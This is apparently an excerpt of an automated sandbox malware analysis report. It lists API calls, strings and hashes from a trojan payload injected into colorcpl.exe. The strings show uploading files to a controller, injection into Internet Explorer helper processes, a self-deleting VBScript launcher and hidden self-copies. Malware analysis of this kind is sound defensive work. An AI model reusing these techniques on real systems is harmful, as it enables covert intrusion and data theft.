• WriteFile.KERNEL32(00000000,046D2AAC,00000004,00000000,00000000), ref: 04661B75
• WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 04661B85
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 04661B96
• WriteFile.KERNEL32(00000000,046D2AB6,00000002,00000000,00000000), ref: 04661BA7
• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 04661BB7
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 04661BC7
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: File$Write$Create
• String ID: RIFF$WAVE$data$fmt
• API String ID: 1602526932-4212202414

APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\colorcpl.exe,00000001,0466764D,C:\Windows\SysWOW64\colorcpl.exe,00000003,04667675,046D52D8,046676CE), ref: 04667284
• GetProcAddress.KERNEL32(00000000), ref: 0466728D
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 046672A2
• GetProcAddress.KERNEL32(00000000), ref: 046672A5
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 046672B6
• GetProcAddress.KERNEL32(00000000), ref: 046672B9
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 046672CA
• GetProcAddress.KERNEL32(00000000), ref: 046672CD
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 046672DE
• GetProcAddress.KERNEL32(00000000), ref: 046672E1
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 046672F2
• GetProcAddress.KERNEL32(00000000), ref: 046672F5
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\SysWOW64\colorcpl.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-2523923970

Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: _free$EnvironmentVariable$_wcschr
• String ID: (]?
• API String ID: 3899193279-1886175342

APIs
• _wcslen.LIBCMT ref: 0466CE07
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,046D50E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0466CE20
• CopyFileW.KERNEL32(C:\Windows\SysWOW64\colorcpl.exe,00000000,00000000,00000000,00000000,00000000,?,046D50E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0466CED0
• _wcslen.LIBCMT ref: 0466CEE6
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0466CF6E
• CopyFileW.KERNEL32(C:\Windows\SysWOW64\colorcpl.exe,00000000,00000000), ref: 0466CF84
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0466CFC3
• _wcslen.LIBCMT ref: 0466CFC6
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0466CFDD
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,046D50E4,0000000E), ref: 0466D02D
• ShellExecuteW.SHELL32(00000000,open,00000000,Function_00066468,Function_00066468,00000001), ref: 0466D04B
• ExitProcess.KERNEL32 ref: 0466D062
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Windows\SysWOW64\colorcpl.exe$del$open
• API String ID: 1579085052-812158594

APIs
• lstrlenW.KERNEL32(?), ref: 0467C036
• _memcmp.LIBVCRUNTIME ref: 0467C04E
• lstrlenW.KERNEL32(?), ref: 0467C067
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0467C0A2
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0467C0B5
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0467C0F9
• lstrcmpW.KERNEL32(?,?), ref: 0467C114
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0467C12C
• _wcslen.LIBCMT ref: 0467C13B
• FindVolumeClose.KERNEL32(?), ref: 0467C15B
• GetLastError.KERNEL32 ref: 0467C173
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0467C1A0
• lstrcatW.KERNEL32(?,?), ref: 0467C1B9
• lstrcpyW.KERNEL32(?,?), ref: 0467C1C8
• GetLastError.KERNEL32 ref: 0467C1D0
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040

APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 04674DD5
• LoadLibraryA.KERNEL32(?), ref: 04674E17
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04674E37
• FreeLibrary.KERNEL32(00000000), ref: 04674E3E
• LoadLibraryA.KERNEL32(?), ref: 04674E76
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04674E88
• FreeLibrary.KERNEL32(00000000), ref: 04674E8F
• GetProcAddress.KERNEL32(00000000,?), ref: 04674E9E
• FreeLibrary.KERNEL32(00000000), ref: 04674EB5
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• API String ID: 2490988753-744132762

APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0467C6B1
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0467C6F5
• RegCloseKey.ADVAPI32(?), ref: 0467C9BF
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
• API String ID: 1332880857-3714951968

Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Similarity
• API ID: _free$_wcschr
• String ID:
• API String ID: 565560161-0

APIs
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: 500fa0793cac74136a762a197a71811c6e4bf8efe8828f0111bcd311a00253ab
• Instruction ID: 1eb156c5f14466b7f8e19f158e9ae20cd077fa575f14dcba9873f3fcd4c8fdfe
• Opcode Fuzzy Hash: 500fa0793cac74136a762a197a71811c6e4bf8efe8828f0111bcd311a00253ab
• Instruction Fuzzy Hash: 34B1BE71900A05AEEB21DF68C880BEEBBF4FF18304F18412DE595A7391E675AD95CF60
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
• Instruction ID: 77cdba49fd42fe058cc930ca065022f1eb340aa33b278e8782ec1149ff2533c5
• Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
• Instruction Fuzzy Hash: 32B19E71D0026A9FDFA0DF68CC84BEEBBF5FF08700F24456AE595A7241DA35A845CB60
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___free_lconv_mon.LIBCMT ref: 046B130A
  • Part of subcall function 046B0502: _free.LIBCMT ref: 046B051F
  • Part of subcall function 046B0502: _free.LIBCMT ref: 046B0531
  • Part of subcall function 046B0502: _free.LIBCMT ref: 046B0543
  • Part of subcall function 046B0502: _free.LIBCMT ref: 046B0555
  • Part of subcall function 046B0502: _free.LIBCMT ref: 046B0567
  • Part of subcall function 046B0502: _free.LIBCMT ref: 046B0579
  • Part of subcall function 046B0502: _free.LIBCMT ref: 046B058B
  • Part of subcall function 046B0502: _free.LIBCMT ref: 046B059D
  • Part of subcall function 046B0502: _free.LIBCMT ref: 046B05AF
  • Part of subcall function 046B0502: _free.LIBCMT ref: 046B05C1
  • Part of subcall function 046B0502: _free.LIBCMT ref: 046B05D3
  • Part of subcall function 046B0502: _free.LIBCMT ref: 046B05E5
  • Part of subcall function 046B0502: _free.LIBCMT ref: 046B05F7
• _free.LIBCMT ref: 046B12FF
  • Part of subcall function 046A6782: RtlFreeHeap.NTDLL(00000000,00000000,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A), ref: 046A6798
  • Part of subcall function 046A6782: GetLastError.KERNEL32(0000000A,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A,0000000A), ref: 046A67AA
• _free.LIBCMT ref: 046B1321
• _free.LIBCMT ref: 046B1336
• _free.LIBCMT ref: 046B1341
• _free.LIBCMT ref: 046B1363
• _free.LIBCMT ref: 046B1376
• _free.LIBCMT ref: 046B1384
• _free.LIBCMT ref: 046B138F
• _free.LIBCMT ref: 046B13C7
• _free.LIBCMT ref: 046B13CE
• _free.LIBCMT ref: 046B13EB
• _free.LIBCMT ref: 046B1403
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 6d08e8a9b2681a5056c8d838ef04c9ca87451fce7365e1dd05852828d4870d72
• Instruction ID: 1c9e784393552e6dc356b850e2a7d5fda3fecea842d7b37f94ba3099c3a95735
• Opcode Fuzzy Hash: 6d08e8a9b2681a5056c8d838ef04c9ca87451fce7365e1dd05852828d4870d72
• Instruction Fuzzy Hash: 85316A31600700AAEB21AA39D884BDA77E8EB12395F54851DE0E8D6660FE31FDD08B94
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 0673200B
• ___free_lconv_mon.LIBCMT ref: 06732016
  • Part of subcall function 0673120E: _free.LIBCMT ref: 0673122B
  • Part of subcall function 0673120E: _free.LIBCMT ref: 0673123D
  • Part of subcall function 0673120E: _free.LIBCMT ref: 0673124F
  • Part of subcall function 0673120E: _free.LIBCMT ref: 06731261
  • Part of subcall function 0673120E: _free.LIBCMT ref: 06731273
  • Part of subcall function 0673120E: _free.LIBCMT ref: 06731285
  • Part of subcall function 0673120E: _free.LIBCMT ref: 06731297
  • Part of subcall function 0673120E: _free.LIBCMT ref: 067312A9
  • Part of subcall function 0673120E: _free.LIBCMT ref: 067312BB
  • Part of subcall function 0673120E: _free.LIBCMT ref: 067312CD
  • Part of subcall function 0673120E: _free.LIBCMT ref: 067312DF
  • Part of subcall function 0673120E: _free.LIBCMT ref: 067312F1
  • Part of subcall function 0673120E: _free.LIBCMT ref: 06731303
• _free.LIBCMT ref: 0673202D
• _free.LIBCMT ref: 06732042
• _free.LIBCMT ref: 0673204D
• _free.LIBCMT ref: 0673206F
• _free.LIBCMT ref: 06732082
• _free.LIBCMT ref: 06732090
• _free.LIBCMT ref: 0673209B
• _free.LIBCMT ref: 067320D3
• _free.LIBCMT ref: 067320DA
• _free.LIBCMT ref: 067320F7
• _free.LIBCMT ref: 0673210F
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free$___free_lconv_mon
• String ID:
• API String ID: 3658870901-0
• Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
• Instruction ID: 6545988c6b3b19ecd39166bf90e077a137483014b7a9c7bcfea008e444dcce98
• Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
• Instruction Fuzzy Hash: D3319131A14229AFDBF4AB39DE48B66B7E9EF00310F208519E578D7552DF31E988CB11
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 04668CE3
• GetFileSizeEx.KERNEL32(00000000,?), ref: 04668D1B
• __aulldiv.LIBCMT ref: 04668D4D
  • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
  • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 04668E70
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 04668E8B
• CloseHandle.KERNEL32(00000000), ref: 04668F64
• CloseHandle.KERNEL32(00000000,00000052), ref: 04668FAE
• CloseHandle.KERNEL32(00000000), ref: 04668FFC
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
• API String ID: 3086580692-2596673759
• Opcode ID: 7e31a1b9496086b86598ee154c2d6726d767bb8b3f03f579ec5e5891024cf6dd
• Instruction ID: 9e120042b8d9ca4c8cc761da8514ea1aa35ee082a8f0cedcb6dba83dd565f7ba
• Opcode Fuzzy Hash: 7e31a1b9496086b86598ee154c2d6726d767bb8b3f03f579ec5e5891024cf6dd
• Instruction Fuzzy Hash: 98B18E716083409BE714FB34C890AAFB7E5EF95258F40491DF48A87290FF71B949CB8A
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 34f343037eecc5b4c673723cb4393a7244358f04db57be8e8a3980ae0a17dbbb
• Instruction ID: 11627d318e92f0ff40c3b7a7b59b346af0479c48a42d2b367df3ffd0efabd570
• Opcode Fuzzy Hash: 34f343037eecc5b4c673723cb4393a7244358f04db57be8e8a3980ae0a17dbbb
• Instruction Fuzzy Hash: 55C12571E40204AFEB20DBA8CC85FDE77F8AB59704F144155FA85FB291F570AD818BA4
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
• Instruction ID: cb712ad21fa19105c7fd0d60745915ae583a0c7e39d5ada6272c1a9a3b246a6a
• Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
• Instruction Fuzzy Hash: 95C19772D00258FFDBA0DBA8CC45FEE77F8AB08750F544169FA14EF282D674994087A0
Uniqueness
Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(?,000000FF,00000000,046D4EF8,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E38
• SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E43
• CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E4C
• closesocket.WS2_32(?), ref: 04664E5A
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E91
• SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664EA2
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664EA9
• SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664EBA
• CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664EBF
• CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664EC4
• SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664ED1
• CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664ED6
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$ObjectSingleWait$closesocket
• String ID:
• API String ID: 3658366068-0
• Opcode ID: 42bc2b70dbecd344f4a4093068534f2d7e5742b36a90f68789dbcab0d31eb04e
• Instruction ID: 67f5e469fe2499bbbe2a710d12b4a8d8279f932926883199846dbcb249da7341
• Opcode Fuzzy Hash: 42bc2b70dbecd344f4a4093068534f2d7e5742b36a90f68789dbcab0d31eb04e
• Instruction Fuzzy Hash: B4213871010B00AFDB216B22DC49B26BBA1FF40326F204A1CE2E311AF0DB75B855DB58
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 04672ACD
  • Part of subcall function 0467B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,046C6468,0466D20D,.vbs,?,?,?,?,?,046D52F0), ref: 0467B99F
  • Part of subcall function 04678568: CloseHandle.KERNEL32(046640F5,?,?,046640F5,046C5E74), ref: 0467857E
  • Part of subcall function 04678568: CloseHandle.KERNEL32(046C5E74,?,?,046640F5,046C5E74), ref: 04678587
• Sleep.KERNEL32(0000000A,046C5E74), ref: 04672C1F
• Sleep.KERNEL32(0000000A,046C5E74,046C5E74), ref: 04672CC1
• Sleep.KERNEL32(0000000A,046C5E74,046C5E74,046C5E74), ref: 04672D63
• DeleteFileW.KERNEL32(00000000,046C5E74,046C5E74,046C5E74), ref: 04672DC5
• DeleteFileW.KERNEL32(00000000,046C5E74,046C5E74,046C5E74), ref: 04672DFC
• DeleteFileW.KERNEL32(00000000,046C5E74,046C5E74,046C5E74), ref: 04672E38
• Sleep.KERNEL32(000001F4,046C5E74,046C5E74,046C5E74), ref: 04672E52
• Sleep.KERNEL32(00000064), ref: 04672E94
  • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "
• API String ID: 1223786279-3856184850
• Opcode ID: 8ff618a9c4aa5bdb95b197c19045d88668794a27acb7fa8c15e959f21a9c35f3
• Instruction ID: 2b05da5544c5aeaaab3c47feb76eb2aebf57e1beb1d839b1e104cf17bd2f47e0
• Opcode Fuzzy Hash: 8ff618a9c4aa5bdb95b197c19045d88668794a27acb7fa8c15e959f21a9c35f3
• Instruction Fuzzy Hash: 120213315083419BE328FB60D8A0AEFB3E5AF95309F50495DE48B47194FF707A4AC69A
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,046D50E4,?,046D5338), ref: 0466F48E
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0466F4B9
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0466F4D5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0466F554
• CloseHandle.KERNEL32(00000000,?,00000000,?,?,046D5338), ref: 0466F563
  • Part of subcall function 0467C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0467C1F5
  • Part of subcall function 0467C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0467C208
• CloseHandle.KERNEL32(00000000,?,046D5338), ref: 0466F66E
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
• API String ID: 3756808967-1743721670
• Opcode ID: c6f83b8b556533d1c70090d217fdeaf5306c8dc8c5192ef1b673ed4f0949704f
• Instruction ID: b475406b3ef65d31f6b7f324dcf49b8004416e33b8ce78bf012425fefac06332
• Opcode Fuzzy Hash: c6f83b8b556533d1c70090d217fdeaf5306c8dc8c5192ef1b673ed4f0949704f
• Instruction Fuzzy Hash: 63713F705083419BE714FF20E8A09EEB7E5AFA5649F40482DE587431A1FF34B94DCB9A
Uniqueness
Uniqueness Score: -1.00%
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID:
• String ID: 65535$udp
• API String ID: 0-1267037602
• Opcode ID: f30e0d579142656752f5762ed14515b46517ac987ed2be9058ccafb2e1701ecc
• Instruction ID: 7b4da59aaeef4b412dbe63d41a15dc85e6cb45ee68764b2615b5bd717914a696
• Opcode Fuzzy Hash: f30e0d579142656752f5762ed14515b46517ac987ed2be9058ccafb2e1701ecc
• Instruction Fuzzy Hash: 1A51D3B5609301AFE7219A68C90CB3A77E8EF94750F08892EF8C597390FF65F8408652
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 04672850: TerminateProcess.KERNEL32(00000000,pth_unenc,0466F8C8), ref: 04672860
  • Part of subcall function 04672850: WaitForSingleObject.KERNEL32(000000FF), ref: 04672873
  • Part of subcall function 046736F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,046D52F0), ref: 04673714
  • Part of subcall function 046736F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0467372D
  • Part of subcall function 046736F8: RegCloseKey.KERNEL32(00000000), ref: 04673738
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0466D859
• ShellExecuteW.SHELL32(00000000,open,00000000,Function_00066468,Function_00066468,00000000), ref: 0466D9B8
• ExitProcess.KERNEL32 ref: 0466D9C4
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
• String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• API String ID: 1913171305-2411266221
• Opcode ID: ca2025de691e490bce0b9b52a1c6acd2e1274bbe791180fca867410241c1b3a4
• Instruction ID: 31c46514fd748ebcede2f35a270da25418e6ebfb759127b0bd0b6b1271212729
• Opcode Fuzzy Hash: ca2025de691e490bce0b9b52a1c6acd2e1274bbe791180fca867410241c1b3a4
• Instruction Fuzzy Hash: 864131319101186BEB14FBA4DC64DFEB7B9AF61609F00016DE407A3190FF307E8ACA98
Uniqueness
Uniqueness Score: -1.00%
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,04661D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0469A892
• GetLastError.KERNEL32(?,?,04661D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0469A89F
• __dosmaperr.LIBCMT ref: 0469A8A6
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,04661D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0469A8D2
• GetLastError.KERNEL32(?,?,?,04661D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0469A8DC
• __dosmaperr.LIBCMT ref: 0469A8E3
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,04661D55,?), ref: 0469A926
• GetLastError.KERNEL32(?,?,?,?,?,?,04661D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0469A930
• __dosmaperr.LIBCMT ref: 0469A937
• _free.LIBCMT ref: 0469A943
• _free.LIBCMT ref: 0469A94A
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
• String ID:
• API String ID: 2441525078-0
• Opcode ID: eef4469f9c2bbdb73f8fdb2aa0378b581ce4822de4ea6d798b2a064978f8c0e1
• Instruction ID: 1a472c6e7ac630bdd6836a01ae63ef2c9088d53ecc028b068a2908b192dafa43
• Opcode Fuzzy Hash: eef4469f9c2bbdb73f8fdb2aa0378b581ce4822de4ea6d798b2a064978f8c0e1
• Instruction Fuzzy Hash: AE31A07190428AABDF11AFE4CC449AE7BECFF01368B140219F920562A0FB30ED51DBA0
Uniqueness
Uniqueness Score: -1.00%
APIs
• SetEvent.KERNEL32(?,?), ref: 046654BF
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0466556F
• TranslateMessage.USER32(?), ref: 0466557E
• DispatchMessageA.USER32(?), ref: 04665589
• HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,046D4F78), ref: 04665641
• HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 04665679
  • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage
• API String ID: 2956720200-749203953
• Opcode ID: 307c18906ff478f6870dfeb6081551c927e46615278092d5e5868d331fc606d7
